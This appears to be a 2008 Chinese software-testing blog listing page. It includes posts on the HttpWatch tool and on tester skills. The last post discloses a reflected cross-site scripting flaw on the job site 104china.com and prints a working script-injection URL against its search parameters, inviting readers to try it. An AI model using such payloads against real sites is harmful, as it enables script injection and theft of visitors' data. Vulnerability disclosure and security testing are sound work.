博主简介:
八年软件测试,五年测试管理,熟悉电商/支付/证券方面测试,研究性能,安全,自动化等测试技术;目前从事互联网金融证券测试!
发布新日志
-
2008-06-24 09:31:47
查看(3265)
评论(4)
收藏
分享
管理
-
2008-06-24 09:31:20
[原创]HttpWatch工具简介及使用技巧
一 概述:HttpWatch强大的网页数据分析工具.集成在Internet Explorer工具栏.包括网页摘要.Cookies管理.缓存管理.消息头发送/接受.字符查询.POST 数据和目录管理功能.报告输出 HttpWatch 是一款能够收集并显示页页深层信息的软件。它不用代理服务器或一些复杂的网络监控工具,就能够在显示网页同时显示网页请求和回应的日志信息。甚至可以显示浏览器缓存和IE之间的交换信息。集成在Internet Explorer工具栏。
二 安装HttpWatch略过^_^
三 基本功能介绍启动Httpwatch
PS: 原想贴在51testing上,内容太过于庞大,其中涉及内容较多,httpwatch工具介绍及使用,http协议,http状态码,cookie的处理机制,get,post等方式知识欢迎访问我的博客:卖烧烤的鱼测试博客 探讨软件测试 软件测试架构 测试流程 测试过程改进 测试管理 需求管理 缺陷管理 配置管理 项目管理 性能测试 安全性测试 可用性测试 可靠性测试 LoadRunner 易用性测试 敏捷测试 快速测试 软件质量保证 质量度量
http://mayingbao.cnblogs.com原贴地址:
http://www.cnblogs.com/mayingbao/archive/2007/11/30/978530.html
查看(4652)
评论(63)
收藏
分享
管理
-
2008-06-24 09:30:39
[原创]测试工作技能
最近经常听许多测试人员不知道学习什么,目前工作性质偏管理,所以也列举了项目中常用的测试可能涉及的地方,给大家做一个参考
下期原创贴子:
1 初级测试工程师面试题
2 中级测试工程师面试题
3 高级测试工程师面试题
大家期待下吧^_^
[
本帖最后由 卖烧烤的鱼 于 2008-6-20 16:56 编辑 ]
techt.gif
查看(2350)
评论(49)
收藏
分享
管理
-
2008-06-23 17:22:40
[原创]104china网站安全性测试漏洞之“跨站脚本注入”
JobListAction.do接口存在漏洞
构造如下脚本:
http://www.104china.com/JobListA ... &lastSearchKey=>'>
<scrīpt>alert('卖烧烤%20的%20鱼%20到此一游')</scrīpt>&searchWay=&orderBy=+order+by+jobList.job.lastDate+desc&city=&city1=&city2=&jobCat=&jobCat1=&jobCat2=&industry=&industry1=&industry2=&sex=2&salarylow=0&salaryhigh=0&salarytype=0&role=0&role1=0&role2=0&appco=-1&capital=0&firstdate=-1&isadvance=0&istitle=1&searchKey=&isFilter=0&lastSearchKey1=&custNoString=&searchType=&searchTypeLink=&lastdate=-1&edu=0&period=0&age=0&flag=
其中还存在如下问题,程序对用户传入据合法性未做判断,如jobid=99999999值后:
http://www.104china.com/JobListA ... b.eduType+desc&jobId=99999999上面的脚本你试试看
说明:其中“搜索”功能这块,对搜索的词类型,搜索词链接,搜索词的值,均存在跨站脚本注入漏洞[
本帖最后由 卖烧烤的鱼 于 2008-6-23 16:23 编辑 ]
104china_1.gif
查看(1454)
评论(1)
收藏
分享
管理